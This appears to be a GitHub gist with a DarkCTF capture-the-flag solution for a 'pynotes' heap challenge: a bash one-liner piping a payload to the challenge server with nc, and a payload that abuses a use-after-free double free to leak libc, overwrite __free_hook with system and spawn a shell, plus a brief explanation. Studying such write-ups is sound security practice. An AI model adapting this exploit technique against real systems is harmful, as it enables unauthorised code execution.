Last active
March 7, 2021 23:27
-
-
Save hkraw/278acf3cf1e5a8c45fa84c532a6a8acd to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
```exploit.sh | |
#!/bin/bash | |
(cat payload; cat)|nc pynotes.darkarmy.xyz 32769 | |
``` | |
```payload | |
unsortedbinoffset = 0x3ebca0 | |
aaa = 0x4f4e0 | |
freehook = 0x3ed8e8 | |
new(0,0xf0,0x1) | |
for i in range(6): | |
delete(0) | |
delete(0) | |
delete(0) | |
libcleak = view(0) | |
libc = libcleak-unsortedbinoffset | |
print(f'Libc: {libc:x}') | |
new(1,0xc8,0xdeadbeef) | |
delete(1) | |
delete(1) | |
new(2,0xc8,libc+freehook) | |
new(3,0xc8,0xdeadbeef) | |
new(4,0xc8,libc+aaa) | |
print("/bin/sh") | |
DARKCTF | |
``` | |
""" | |
The challenge was simple heap exploitation challenge. I gave the python extension module. `_notes` The bug? | |
UAF, WHich make double free. | |
Just be carefull with what sizes you choose, and how you write expl. Nothing new. somehow print() does free on the string we give. | |
free_hook -> system and print("/bin/sh") | |
""" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment